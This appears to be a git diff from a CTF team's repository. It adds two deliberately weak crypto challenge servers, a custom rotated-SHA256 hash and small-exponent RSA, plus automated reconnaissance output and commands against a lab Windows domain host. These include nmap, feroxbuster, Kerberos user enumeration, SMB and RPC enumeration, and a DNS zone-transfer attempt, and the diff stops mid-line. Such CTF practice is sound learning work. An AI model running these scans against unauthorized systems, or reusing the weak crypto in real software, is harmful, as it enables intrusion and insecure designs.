diff --git a/LaokoonHaxorcist/crypto_me_is_me/server.py b/LaokoonHaxorcist/crypto_me_is_me/server.py new file mode 100644 index 00000000..d1720f64 --- /dev/null +++ b/LaokoonHaxorcist/crypto_me_is_me/server.py @@ -0,0 +1,42 @@ +from secret import FLAG +from hashlib import sha256 + + +class hash(): + + def __init__(self, message): + self.message = message + + def rotate(self, message): + return [((b >> 4) | (b << 3)) & 0xff for b in message] + + def hexdigest(self): + rotated = self.rotate(self.message) + return sha256(bytes(rotated)).hexdigest() + + +def main(): + original_message = b"ready_play_one!" + original_digest = hash(original_message).hexdigest() + print( + f"Find a message that generate the same hash as this one: {original_digest}" + ) + + while True: + try: + message = input("Enter your message: ") + message = bytes.fromhex(message) + + digest = hash(message).hexdigest() + + if ((original_digest == digest) and (message != original_message)): + print(f"{FLAG}") + else: + print("Conditions not satisfied!") + + except Exception as e: + print(f"An error occurred while processing data: {e}") + + +if __name__ == '__main__': + main() diff --git a/LaokoonHaxorcist/crypto_psa_games/server.py b/LaokoonHaxorcist/crypto_psa_games/server.py new file mode 100644 index 00000000..e5847da9 --- /dev/null +++ b/LaokoonHaxorcist/crypto_psa_games/server.py @@ -0,0 +1,58 @@ +from Crypto.Util.number import bytes_to_long, getPrime, GCD +from Crypto.Util.Padding import pad +# from secret import FLAG + +WELCOME = '''Welcome to my custom PSA cryptosystem! +In this cryptosystem, the message is PKCS#7 padded and then encrypted with RSA. +They say padding makes encryption more secure, right? ;)''' + +MENU = ''' +[1] Encrypt the flag +[2] Exit +''' + + +class PSA: + + def __init__(self): + self.bit_size = 512 + self.e = 11 + + def gen_modulus(self): + while True: + p = getPrime(self.bit_size // 2) + q = getPrime(self.bit_size // 2) + if GCD(self.e, (p - 1) * (q - 1)) == 1: + break + return p * q + + def encrypt(self, msg): + m = bytes_to_long(pad(msg, 16)) + n = self.gen_modulus() + c = pow(m, self.e, n) + return c, n + + +def main(): + psa = PSA() + print(WELCOME) + while True: + try: + print(MENU) + opt = input('> ') + if opt == '1': + enc, modulus = psa.encrypt(b'FLAG') + print(f"\n{hex(enc)}\n{hex(modulus)}") + elif opt == '2': + print('Bye.') + exit(1) + else: + print('\nInvalid option!') + except: + print('\n\nSomething went wrong.') + exit(1) + + +if __name__ == '__main__': + # main() + print(0x65c96a10a5553c2eb1b05ac1369a777089841005b055cbf8dcafc41fd1d11b0a0306b820cbc742796318694b9fdf145214ef3a2385984daa0d6d5ba87bdce687) \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state b/LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state new file mode 100644 index 00000000..50bc5b6d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/ferox-http_10_129_243_131:80_-1698492933.state @@ -0,0 +1 @@ +{"scans":[{"id":"c91a32f9c25f4d919c972d924014c2df","url":"http://10.129.243.131:80/","normalized_url":"http://10.129.243.131:80/","scan_type":"Directory","status":"Running","num_requests":833000},{"id":"4738972d3e8744bd9aa88c8925201b37","url":"http://10.129.243.131/text/","normalized_url":"http://10.129.243.131/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"127b151685a44a88aa7cd792c4435b75","url":"http://10.129.243.131/script.js","normalized_url":"http://10.129.243.131/script.js/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0957cded65794d41a274d2df66abcfbb","url":"http://10.129.243.131/text/css","normalized_url":"http://10.129.243.131/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0036760fe13545d79aa04cc6cc7dc498","url":"http://10.129.243.131/style.css","normalized_url":"http://10.129.243.131/style.css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"ee08d5151dfc4a7d96671603842a22eb","url":"http://10.129.243.131/.git/text/","normalized_url":"http://10.129.243.131/.git/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"b52e11997d8e42278f8b27518a121b23","url":"http://10.129.243.131/.git/text/css","normalized_url":"http://10.129.243.131/.git/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"4607674520054cfbbba2277f855ee224","url":"http://10.129.243.131/.git/logs/text/","normalized_url":"http://10.129.243.131/.git/logs/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"65d97633b79d48749bc176e399a4b70d","url":"http://10.129.243.131/.git/logs/text/css","normalized_url":"http://10.129.243.131/.git/logs/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"046706eb4fef490fa0a098b88dee49bc","url":"http://10.129.243.131/.svn/text/css","normalized_url":"http://10.129.243.131/.svn/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"27943d584c634bac95093f6a03f41ada","url":"http://10.129.243.131/.svn/text/","normalized_url":"http://10.129.243.131/.svn/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"356dcc3f1e03417aa78932513d2f9d02","url":"http://10.129.243.131/.well-known/text/","normalized_url":"http://10.129.243.131/.well-known/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"9a77c322bbe54bd98cf5265ae43eb2ab","url":"http://10.129.243.131/.well-known/autoconfig/text/","normalized_url":"http://10.129.243.131/.well-known/autoconfig/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e21ae1192e294b5a849b688b56b69625","url":"http://10.129.243.131/.well-known/text/css","normalized_url":"http://10.129.243.131/.well-known/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e08380f4f1dc4597871aa763ef00eb08","url":"http://10.129.243.131/.well-known/autoconfig/text/css","normalized_url":"http://10.129.243.131/.well-known/autoconfig/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"59d5ebeacaea473b87cba620e094d24e","url":"http://10.129.243.131/CVS/text/","normalized_url":"http://10.129.243.131/CVS/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"afb07d7bdff44414a8184420bd330e77","url":"http://10.129.243.131/CVS/text/css","normalized_url":"http://10.129.243.131/CVS/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"851db73660fa47709b315e88932f5c61","url":"http://10.129.243.131/_vti_bin/_vti_adm/text/css","normalized_url":"http://10.129.243.131/_vti_bin/_vti_adm/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"652dab299a6045e0bd3e7ce168cf7bef","url":"http://10.129.243.131/_vti_bin/_vti_aut/text/","normalized_url":"http://10.129.243.131/_vti_bin/_vti_aut/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"d6467b8752394e9c91037814ffc40cf9","url":"http://10.129.243.131/_vti_bin/_vti_adm/text/","normalized_url":"http://10.129.243.131/_vti_bin/_vti_adm/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"9d77e48ae1a749e2a6eda6a69a9aa853","url":"http://10.129.243.131/_vti_bin/_vti_aut/text/css","normalized_url":"http://10.129.243.131/_vti_bin/_vti_aut/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e60310109bb642f9a8072f90dd66296d","url":"http://10.129.243.131/_vti_bin/text/css","normalized_url":"http://10.129.243.131/_vti_bin/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"c8b6036f78334b3ea8b9864af3e8bb19","url":"http://10.129.243.131/_vti_bin/text/","normalized_url":"http://10.129.243.131/_vti_bin/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0ff327c7b32c4308958e018b90ba7fe0","url":"http://10.129.243.131/android/text/","normalized_url":"http://10.129.243.131/android/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"20ffbdd5b7484a0cba1704aeebc63111","url":"http://10.129.243.131/android/text/css","normalized_url":"http://10.129.243.131/android/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"869cee124fc54b3784e986709e4f89bb","url":"http://10.129.243.131/api/text/css","normalized_url":"http://10.129.243.131/api/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e779936b7a624aea95e7f4aa040df421","url":"http://10.129.243.131/api/experiments/text/","normalized_url":"http://10.129.243.131/api/experiments/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"1075320433124adda1d6f355f6b4e6f3","url":"http://10.129.243.131/api/experiments/text/css","normalized_url":"http://10.129.243.131/api/experiments/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"dbb0024e529c42c89914719cb54b3628","url":"http://10.129.243.131/api/text/","normalized_url":"http://10.129.243.131/api/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"94f7ec3044c7451e979d5e3b7a7e236a","url":"http://10.129.243.131/cgi-bin/text/","normalized_url":"http://10.129.243.131/cgi-bin/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"cea6f3f3a737419e94d10f14146f9758","url":"http://10.129.243.131/cgi-bin/text/css","normalized_url":"http://10.129.243.131/cgi-bin/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"3839e0a97e7e4fec83ea4b9640bc61dc","url":"http://10.129.243.131/federation/text/css","normalized_url":"http://10.129.243.131/federation/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"a7555d65e45144a9b3b24a99664d2789","url":"http://10.129.243.131/federation/text/","normalized_url":"http://10.129.243.131/federation/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"8cd8579744c84f17bd3857421a72f467","url":"http://10.129.243.131/ios/text/","normalized_url":"http://10.129.243.131/ios/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"df34b24b9eb348fba623cf7c65e0a629","url":"http://10.129.243.131/ios/text/css","normalized_url":"http://10.129.243.131/ios/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"ce2cfbd99a594b0d9b8e1f366e397c00","url":"http://10.129.243.131/mfa/text/","normalized_url":"http://10.129.243.131/mfa/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"c573be1f27a84c0d9bf4ab3159a8e159","url":"http://10.129.243.131/mfa/text/css","normalized_url":"http://10.129.243.131/mfa/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"be8aeb2062db44a4b43808aca4915002","url":"http://10.129.243.131/oauth/text/","normalized_url":"http://10.129.243.131/oauth/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"b391907c71a44d1aaa6ea7044c15bcca","url":"http://10.129.243.131/oauth/text/css","normalized_url":"http://10.129.243.131/oauth/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e3210ec8d76e4b92acb11be52cf001a3","url":"http://10.129.243.131/oauth/device/text/css","normalized_url":"http://10.129.243.131/oauth/device/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0f84c6da10064b50a6daeb87ec48ef3a","url":"http://10.129.243.131/oauth/device/text/","normalized_url":"http://10.129.243.131/oauth/device/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"4bca1f7ac3da46078a45d8df91cac6c7","url":"http://10.129.243.131/oauth/token/text/","normalized_url":"http://10.129.243.131/oauth/token/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"666b0e7248d54391aec3970842cc8ce3","url":"http://10.129.243.131/oauth/token/text/css","normalized_url":"http://10.129.243.131/oauth/token/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"00e94dec348b40d48fd0c6e0032833d8","url":"http://10.129.243.131/oidc/text/","normalized_url":"http://10.129.243.131/oidc/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"65e28d2f09ac4351a1647eed00ca6777","url":"http://10.129.243.131/oidc/text/css","normalized_url":"http://10.129.243.131/oidc/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"8ae71645bf82449fbe516854a791aedc","url":"http://10.129.243.131/servlet/text/css","normalized_url":"http://10.129.243.131/servlet/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"492f31b4c98f4ff082b471ddadc9bc2b","url":"http://10.129.243.131/servlet/text/","normalized_url":"http://10.129.243.131/servlet/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"f24a0b5e5b1b47eb97e1e39325733d2a","url":"http://10.129.243.131/token/text/css","normalized_url":"http://10.129.243.131/token/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0bf1f3c3709347a29b773cce4142953d","url":"http://10.129.243.131/token/text/","normalized_url":"http://10.129.243.131/token/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0db5e881d72d48ada67955256fbded64","url":"http://10.129.243.131/v1/text/css","normalized_url":"http://10.129.243.131/v1/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"731da94d800046b68281f0e00d3dce0d","url":"http://10.129.243.131/v1/text/","normalized_url":"http://10.129.243.131/v1/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"6464d059fd104ad693dc951109999b1c","url":"http://10.129.243.131/v2/text/","normalized_url":"http://10.129.243.131/v2/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"ade8a1306c3f4ccfa6e157960a19c64c","url":"http://10.129.243.131/v2/text/css","normalized_url":"http://10.129.243.131/v2/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000}],"config":{"type":"configuration","wordlist":"/root/.local/share/AutoRecon/wordlists/dirbuster.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://10.129.243.131:80/","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":10,"timeout":7,"verbosity":1,"silent":false,"quiet":true,"auto_bail":false,"auto_tune":false,"json":false,"output":"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":true,"extensions":["txt","html","php","asp","aspx","jsp"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":true,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://10.129.243.131/script.js","original_url":"http://10.129.243.131/script.js","path":"/script.js","wildcard":false,"status":200,"method":"GET","content_length":692,"line_count":25,"word_count":72,"headers":{"accept-ranges":"bytes","etag":"\"0958b5c52bcd61:0\"","date":"Sat, 28 Oct 2023 12:22:06 GMT","content-type":"application/javascript","server":"Microsoft-IIS/10.0","content-length":"692","last-modified":"Mon, 16 Nov 2020 19:54:58 GMT"},"extension":""},{"type":"response","url":"http://10.129.243.131/style.css","original_url":"http://10.129.243.131/style.css","path":"/style.css","wildcard":false,"status":200,"method":"GET","content_length":3166,"line_count":215,"word_count":294,"headers":{"last-modified":"Fri, 20 Aug 2021 13:41:48 GMT","content-type":"text/css","accept-ranges":"bytes","date":"Sat, 28 Oct 2023 12:22:06 GMT","content-length":"3166","etag":"\"0767d1fc995d71:0\"","server":"Microsoft-IIS/10.0"},"extension":""},{"type":"response","url":"http://10.129.243.131/","original_url":"http://10.129.243.131:80/","path":"/","wildcard":false,"status":200,"method":"GET","content_length":1034,"line_count":41,"word_count":66,"headers":{"date":"Sat, 28 Oct 2023 12:22:06 GMT","content-length":"1034","accept-ranges":"bytes","content-type":"text/html","last-modified":"Fri, 20 Aug 2021 13:39:48 GMT","etag":"\"0eaf6d7c895d71:0\"","server":"Microsoft-IIS/10.0"},"extension":""},{"type":"response","url":"http://10.129.243.131/Index.html","original_url":"http://10.129.243.131:80/","path":"/Index.html","wildcard":false,"status":200,"method":"GET","content_length":1034,"line_count":41,"word_count":66,"headers":{"content-length":"1034","content-type":"text/html","server":"Microsoft-IIS/10.0","last-modified":"Fri, 20 Aug 2021 13:39:48 GMT","date":"Sat, 28 Oct 2023 12:22:17 GMT","accept-ranges":"bytes","etag":"\"0eaf6d7c895d71:0\""},"extension":""},{"type":"response","url":"http://10.129.243.131/LICENSE.txt","original_url":"http://10.129.243.131:80/","path":"/LICENSE.txt","wildcard":false,"status":200,"method":"GET","content_length":1092,"line_count":8,"word_count":168,"headers":{"content-type":"text/plain","accept-ranges":"bytes","etag":"\"0958b5c52bcd61:0\"","server":"Microsoft-IIS/10.0","date":"Sat, 28 Oct 2023 12:22:17 GMT","content-length":"1092","last-modified":"Mon, 16 Nov 2020 19:54:58 GMT"},"extension":""},{"type":"response","url":"http://10.129.243.131/Search.php","original_url":"http://10.129.243.131:80/","path":"/Search.php","wildcard":false,"status":200,"method":"GET","content_length":116,"line_count":1,"word_count":14,"headers":{"x-powered-by":"PHP/8.0.0","date":"Sat, 28 Oct 2023 12:22:19 GMT","content-type":"text/html; charset=UTF-8","server":"Microsoft-IIS/10.0","content-length":"116"},"extension":""},{"type":"response","url":"http://10.129.243.131/index.html","original_url":"http://10.129.243.131:80/","path":"/index.html","wildcard":false,"status":200,"method":"GET","content_length":1034,"line_count":41,"word_count":66,"headers":{"content-type":"text/html","etag":"\"0eaf6d7c895d71:0\"","accept-ranges":"bytes","last-modified":"Fri, 20 Aug 2021 13:39:48 GMT","server":"Microsoft-IIS/10.0","date":"Sat, 28 Oct 2023 12:23:36 GMT","content-length":"1034"},"extension":""},{"type":"response","url":"http://10.129.243.131/license.txt","original_url":"http://10.129.243.131:80/","path":"/license.txt","wildcard":false,"status":200,"method":"GET","content_length":1092,"line_count":8,"word_count":168,"headers":{"content-type":"text/plain","date":"Sat, 28 Oct 2023 12:23:47 GMT","content-length":"1092","last-modified":"Mon, 16 Nov 2020 19:54:58 GMT","server":"Microsoft-IIS/10.0","accept-ranges":"bytes","etag":"\"0958b5c52bcd61:0\""},"extension":""},{"type":"response","url":"http://10.129.243.131/search.php","original_url":"http://10.129.243.131:80/","path":"/search.php","wildcard":false,"status":200,"method":"GET","content_length":116,"line_count":1,"word_count":14,"headers":{"x-powered-by":"PHP/8.0.0","server":"Microsoft-IIS/10.0","content-length":"116","content-type":"text/html; charset=UTF-8","date":"Sat, 28 Oct 2023 12:24:30 GMT"},"extension":""}],"statistics":{"type":"statistics","timeouts":70,"requests":135013,"expected_per_scan":833000,"total_expected":833385,"errors":70,"successes":12,"redirects":0,"client_errors":134931,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":55,"extensions_collected":0,"status_200s":12,"status_301s":0,"status_302s":0,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":9,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[]} \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/hashes.asreproast b/LaokoonHaxorcist/fullpwn/hashes.asreproast new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/local.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/local.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt new file mode 100644 index 00000000..1c35dda7 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt @@ -0,0 +1,244 @@ +[*] domain found on tcp/53. + + + +[*] http found on tcp/80. + + + +[*] kerberos-sec found on tcp/88. + + + +[*] msrpc found on tcp/135. + + + +[*] netbios-ssn found on tcp/139. + + + +[*] ldap found on tcp/389. + + + +[*] microsoft-ds found on tcp/445. + + + +[*] kpasswd5 found on tcp/464. + + + +[*] ncacn_http found on tcp/593. + + + +[*] tcpwrapped found on tcp/636. + + + +[*] ldap found on tcp/3268. + + + +[*] tcpwrapped found on tcp/3269. + + + +[*] wsman found on tcp/5985. + + + +[*] mc-nmf found on tcp/9389. + + + +[*] msrpc found on tcp/49667. + + + +[*] msrpc found on tcp/49673. + + + +[*] ncacn_http found on tcp/49674. + + + +[*] msrpc found on tcp/49695. + + + +[*] msrpc found on tcp/49843. + + + +[*] domain found on tcp/53. + + + +[*] http found on tcp/80. + + + +[*] kerberos-sec found on tcp/88. + + + +[*] msrpc found on tcp/135. + + + +[*] netbios-ssn found on tcp/139. + + + +[*] ldap found on tcp/389. + + + +[*] microsoft-ds found on tcp/445. + + + +[*] kpasswd5 found on tcp/464. + + + +[*] ncacn_http found on tcp/593. + + + +[*] tcpwrapped found on tcp/636. + + + +[*] ldap found on tcp/3268. + + + +[*] tcpwrapped found on tcp/3269. + + + +[*] wsman found on tcp/5985. + + + +[*] mc-nmf found on tcp/9389. + + + +[*] unknown found on tcp/49667. + + + +[*] unknown found on tcp/49673. + + + +[*] ncacn_http found on tcp/49674. + + + +[*] unknown found on tcp/49695. + + + +[*] unknown found on tcp/49843. + + + +[*] domain found on udp/53. + + + +[*] ntp found on udp/123. + + + +[*] domain found on tcp/53. + + + +[*] http found on tcp/80. + + + +[*] kerberos-sec found on tcp/88. + + + +[*] msrpc found on tcp/135. + + + +[*] netbios-ssn found on tcp/139. + + + +[*] ldap found on tcp/389. + + + +[*] microsoft-ds found on tcp/445. + + + +[*] kpasswd5 found on tcp/464. + + + +[*] ncacn_http found on tcp/593. + + + +[*] tcpwrapped found on tcp/636. + + + +[*] ldap found on tcp/3268. + + + +[*] tcpwrapped found on tcp/3269. + + + +[*] wsman found on tcp/5985. + + + +[*] mc-nmf found on tcp/9389. + + + +[*] msrpc found on tcp/49667. + + + +[*] ncacn_http found on tcp/49674. + + + +[*] msrpc found on tcp/49695. + + + +[*] msrpc found on tcp/49843. + + + +[*] domain found on udp/53. + + + +[*] kerberos-sec found on udp/88. + + + +[*] ntp found on udp/123. + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/proof.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/proof.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md new file mode 100644 index 00000000..65f369e2 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md @@ -0,0 +1,177 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX 